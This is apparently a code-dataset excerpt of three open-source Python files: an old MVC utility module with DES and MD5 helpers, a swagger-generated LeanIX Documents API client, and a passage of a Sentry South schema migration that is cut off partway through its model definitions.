|
9wfox/mvc
|
utility.py
|
1
|
6713
|
# -*- coding:utf-8 -*-
"""
工具
历史:
2011-08-03 + 重构 get_pys_members。
2011-08-15 * 修改 con_mongo_object,支持 objectid。
2011-08-20 + 增加 template_path, static_path。
2011-08-25 * 将参数检查函数从 loigc 转移过来。
2011-08-27 * 重构 get_pys_members,改名 get_members。
"""
from datetime import datetime
from sys import argv
from os import walk, listdir
from os.path import abspath, join as path_join, dirname, basename, splitext
from fnmatch import fnmatch
from hashlib import md5
from base64 import b64encode, b64decode
from inspect import ismodule, getmembers
from bson.objectid import ObjectId
try:
from pyDes import des, triple_des, PAD_PKCS5, CBC
_enc_key = lambda length: __conf__.ENCRYPT_KEY.zfill(length)[:length]
_cipher = lambda: des(_enc_key(8), mode = CBC, IV = "\0" * 8, padmode = PAD_PKCS5)
except:
pass
### 应用程序路径函数 ####################################################################################
ROOT_PATH = dirname(abspath(argv[0]))
app_path = lambda n: path_join(ROOT_PATH, n)
template_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.TEMPLATE_DIR_NAME, n))
static_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.STATIC_DIR_NAME, n))
### 装饰器 #############################################################################################
def staticclass(cls):
def new(cls, *args, **kwargs):
raise RuntimeError("Static Class")
setattr(cls, "__new__", staticmethod(new))
return cls
class sealedclass(type):
"""
metaclass: Sealed Class
"""
_types = set()
def __init__(cls, name, bases, attr):
for t in bases:
if t in cls._types: raise SyntaxError("sealed class")
cls._types.add(cls)
class partialclass(type):
"""
metaclass: Partial Class
class A(object):
y = 456
def test(self): print "test"
class B(object):
__metaclass__ = partialclass
__mainclass__ = A
x = 1234
def do(self):
self.test()
print self.x, self.y
A().do()
"""
def __init__(cls, name, bases, attr):
print "cls:", cls
print "name:", name
print "bases:", bases
print "attr:", attr
main_class = attr.pop("__mainclass__")
map(lambda a: setattr(main_class, a[0], a[1]), [(k, v) for k, v in attr.items() if "__" not in k])
### 杂类函数 ############################################################################################
def get_modules(pkg_name, module_filter = None):
"""
返回包中所有符合条件的模块。
参数:
pkg_name 包名称
module_filter 模块名过滤器 def (module_name)
"""
path = app_path(pkg_name)
#py_filter = lambda f: all((fnmatch(f, "*.py"), not f.startswith("__"), module_filter and module_filter(f) or True))
py_filter = lambda f: all((fnmatch(f, "*.pyc") or fnmatch(f, "*.py"), not f.startswith("__"), module_filter and module_filter(f) or True))
names = [splitext(n)[0] for n in listdir(path) if py_filter(n)]
return [__import__("{0}.{1}".format(pkg_name, n)).__dict__[n] for n in names]
def get_members(pkg_name, module_filter = None, member_filter = None):
"""
返回包中所有符合条件的模块成员。
参数:
pkg_name 包名称
module_filter 模块名过滤器 def (module_name)
member_filter 成员过滤器 def member_filter(module_member_object)
"""
modules = get_modules(pkg_name, module_filter)
ret = {}
for m in modules:
members = dict(("{0}.{1}".format(v.__module__, k), v) for k, v in getmembers(m, member_filter))
ret.update(members)
return ret
def set_default_encoding():
"""
设置系统默认编码
"""
import sys, locale
reload(sys)
lang, coding = locale.getdefaultlocale()
#sys.setdefaultencoding(coding)
def conv_mongo_object(d):
"""
将 MongoDB 返回结果中的:
(1) Unicode 还原为 str。
(2) ObjectId 还原为 str。
"""
if isinstance(d, (unicode, ObjectId, datetime)):
return str(d)
elif isinstance(d, (list, tuple)):
return [conv_mongo_object(x) for x in d]
elif isinstance(d, dict):
return dict([(conv_mongo_object(k), conv_mongo_object(v)) for k, v in d.items()])
else:
return d
mongo_conv = conv_mongo_object
### 哈希加密函数 ########################################################################################
def hash2(o):
"""
哈希函数
"""
return md5(str(o)).hexdigest()
def encrypt(s, base64 = False):
"""
对称加密函数
"""
e = _cipher().encrypt(s)
return base64 and b64encode(e) or e
def decrypt(s, base64 = False):
"""
对称解密函数
"""
return _cipher().decrypt(base64 and b64decode(s) or s)
### 参数检查函数 ########################################################################################
def not_null(*args):
"""
检查参数不为None
"""
if not all(map(lambda v: v is not None, args)):
raise ValueError("Argument must be not None/Null!")
def not_empty(*args):
"""
检查参数不为空
"""
if not all(args):
raise ValueError("Argument must be not None/Null/Zero/Empty!")
def args_range(min_value, max_value, *args):
"""
检查参数范围
"""
not_null(*args)
if not all(map(lambda v: min_value <= v <= max_value, args)):
raise ValueError("Argument must be between {0} and {1}!".format(min_value, max_value))
def args_length(min_len, max_len, *args):
"""
检查参数长度
"""
not_null(*args)
if not all(map(lambda v: min_len <= len(v) <= max_len, args)):
raise ValueError("Argument length must be between {0} and {1}!".format(min_len, max_len))
__all__ = ["ROOT_PATH", "app_path", "template_path", "static_path",
"staticclass", "sealedclass", "partialclass",
"get_modules", "get_members",
"conv_mongo_object", "mongo_conv", "set_default_encoding",
"hash2", "encrypt", "decrypt",
"not_null", "not_empty", "args_range", "args_length"]
|
mit
| 6,438,945,186,189,151,000
| 24.227273
| 142
| 0.507799
| false
| 3.233316
| false
| false
| false
|
leanix/leanix-sdk-python
|
src/leanix/DocumentsApi.py
|
1
|
11645
|
#!/usr/bin/env python
"""
The MIT License (MIT)
Copyright (c) 2017 LeanIX GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
import sys
import os
from models import *
class DocumentsApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getDocuments(self, **kwargs):
"""
Read all documents
Args:
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
filter, str: Full-text filter (optional)
referenceSystem, str: Reference system filter, e.g. Signavio (optional)
referenceID, str: ReferenceID, e.g. Signavio ID (optional)
factSheetID, str: FactSheetID, e.g. LeanIX ID (optional)
Returns: Array[Document]
"""
allParams = ['relations', 'filter', 'referenceSystem', 'referenceID', 'factSheetID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocuments" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('filter' in params):
queryParams['filter'] = self.apiClient.toPathValue(params['filter'])
if ('referenceSystem' in params):
queryParams['referenceSystem'] = self.apiClient.toPathValue(params['referenceSystem'])
if ('referenceID' in params):
queryParams['referenceID'] = self.apiClient.toPathValue(params['referenceID'])
if ('factSheetID' in params):
queryParams['factSheetID'] = self.apiClient.toPathValue(params['factSheetID'])
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Array[Document]')
return responseObject
def createDocument(self, **kwargs):
"""
Create a new Document
Args:
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method createDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def getDocument(self, ID, **kwargs):
"""
Read a Document by a given ID
Args:
ID, str: Unique ID (required)
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
Returns: Document
"""
allParams = ['ID', 'relations']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def updateDocument(self, ID, **kwargs):
"""
Update a Document by a given ID
Args:
ID, str: Unique ID (required)
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def deleteDocument(self, ID, **kwargs):
"""
Delete a Document by a given ID
Args:
ID, str: Unique ID (required)
Returns:
"""
allParams = ['ID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
def updateDataObject(self, ID, **kwargs):
"""
Update the data object for the given document ID
Args:
ID, str: Unique ID (required)
body, DataObject: Message-Body (optional)
Returns: DataObject
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDataObject" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}/dataobjects'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DataObject')
return responseObject
|
mit
| -3,196,921,589,828,660,000
| 30.136364
| 162
| 0.575784
| false
| 4.722222
| false
| false
| false
|
mvaled/sentry
|
src/sentry/south_migrations/0480_incidentactivity.py
|
1
|
136910
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
# Flag to indicate if this migration is too risky
# to run online and needs to be coordinated for offline
is_dangerous = False
def forwards(self, orm):
# Adding model 'IncidentActivity'
db.create_table('sentry_incidentactivity', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('incident', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.Incident'])),
('user', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.User'], null=True)),
('type', self.gf('django.db.models.fields.IntegerField')()),
('value', self.gf('django.db.models.fields.TextField')(null=True)),
('previous_value', self.gf('django.db.models.fields.TextField')(null=True)),
('comment', self.gf('django.db.models.fields.TextField')(null=True)),
('event_stats_snapshot', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.TimeSeriesSnapshot'], null=True)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['IncidentActivity'])
# Adding model 'TimeSeriesSnapshot'
db.create_table('sentry_timeseriessnapshot', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('start', self.gf('django.db.models.fields.DateTimeField')()),
('end', self.gf('django.db.models.fields.DateTimeField')()),
('values', self.gf('sentry.db.models.fields.array.ArrayField')(
of=(u'django.db.models.fields.IntegerField', [], {}))),
('period', self.gf('django.db.models.fields.IntegerField')()),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['TimeSeriesSnapshot'])
def backwards(self, orm):
# Deleting model 'IncidentActivity'
db.delete_table('sentry_incidentactivity')
# Deleting model 'TimeSeriesSnapshot'
db.delete_table('sentry_timeseriessnapshot')
models = {
'sentry.activity': {
'Meta': {'unique_together': '()', 'object_name': 'Activity', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apiapplication': {
'Meta': {'unique_together': '()', 'object_name': 'ApiApplication', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "'12bc89ca7374404ea6921393b99c2e83ca9087accd2345a19bc5c5fc3892410a'", 'unique': 'True', 'max_length': '64'}),
'client_secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'3b5eb3fdb9a44c908cc9392a5fd7b133e999526dea0d455ea24fc3cd719a22c0'"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Quiet Spaniel'", 'max_length': '64', 'blank': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'privacy_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'terms_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.apiauthorization': {
'Meta': {'unique_together': "(('user', 'application'),)", 'object_name': 'ApiAuthorization', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apigrant': {
'Meta': {'unique_together': '()', 'object_name': 'ApiGrant', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']"}),
'code': ('django.db.models.fields.CharField', [], {'default': "'20e6168c01b8433daaf1d95b568cec7e'", 'max_length': '64', 'db_index': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 16, 0, 0)', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'redirect_uri': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apikey': {
'Meta': {'unique_together': '()', 'object_name': 'ApiKey', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Organization']"}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.apitoken': {
'Meta': {'unique_together': '()', 'object_name': 'ApiToken', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'refresh_token': ('django.db.models.fields.CharField', [], {'default': "'1baed9fb48f145d2ac57b013160dc650e4c940d6c5f14789a331cf28b3af7c45'", 'max_length': '64', 'unique': 'True', 'null': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'token': ('django.db.models.fields.CharField', [], {'default': "'cde3d55c0f444c42acd08de782b5f7fcf3a0c44d35a94cb4b40472b82a437a0d'", 'unique': 'True', 'max_length': '64'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.assistantactivity': {
'Meta': {'unique_together': "(('user', 'guide_id'),)", 'object_name': 'AssistantActivity', 'db_table': "'sentry_assistant_activity'", 'index_together': '()'},
'dismissed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'guide_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'useful': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'viewed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'unique_together': '()', 'object_name': 'AuditLogEntry', 'index_together': '()'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authenticator': {
'Meta': {'unique_together': "(('user', 'type'),)", 'object_name': 'Authenticator', 'db_table': "'auth_authenticator'", 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity', 'index_together': '()'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'unique_together': '()', 'object_name': 'AuthProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'unique_together': '()', 'object_name': 'Broadcast', 'index_together': '()'},
'cta': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 23, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'upstream_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'})
},
'sentry.broadcastseen': {
'Meta': {'unique_together': "(('broadcast', 'user'),)", 'object_name': 'BroadcastSeen', 'index_together': '()'},
'broadcast': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Broadcast']"}),
'date_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.commit': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'Commit', 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {'unique_together': "(('organization_id', 'email'), ('organization_id', 'external_id'))", 'object_name': 'CommitAuthor', 'index_together': '()'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '164', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.commitfilechange': {
'Meta': {'unique_together': "(('commit', 'filename'),)", 'object_name': 'CommitFileChange', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'sentry.counter': {
'Meta': {'unique_together': '()', 'object_name': 'Counter', 'db_table': "'sentry_projectcounter'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dashboard': {
'Meta': {'unique_together': "(('organization', 'title'),)", 'object_name': 'Dashboard', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
